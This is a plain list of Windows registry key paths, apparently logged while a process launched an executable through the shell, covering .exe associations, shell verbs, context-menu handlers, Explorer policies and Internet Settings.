\Device\RasAcd
HKEY_CLASSES_ROOT\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.Exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{00021401-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\DataHandler
HKEY_CLASSES_ROOT\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\DataHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\DataHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}\SuppressionPolicy
HKEY_CLASSES_ROOT\CLSID\{596AB062-B4D2-4215-9F74-E9109B0A8153}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\shellex\NoAddToRecent
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{6C467336-8281-4E60-8204-430CED96822D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{6C467336-8281-4E60-8204-430CED96822D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_CLASSES_ROOT\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\shellex\NoAddToRecent
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_CLASSES_ROOT\CLSID\{09799AFB-AD67-11D1-ABCD-00C04FC30936}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_CLASSES_ROOT\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{00F3C2EC-A6EE-11DE-A03A-EF8F55D89593}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\shellex\MayChangeDefaultMenu
HKEY_CLASSES_ROOT\CLSID\{1D27F844-3A1F-4410-85AC-14651078412D}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_CLASSES_ROOT\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\SupportedProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\runas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DropTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\SupportedProtocols
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Shell\runasuser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\CredUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\CredUI
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_CLASSES_ROOT\CLSID\{37EA3A21-7493-4208-A011-7F9EA79CE9F5}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\LinkHandler
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_CLASSES_ROOT\.adp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
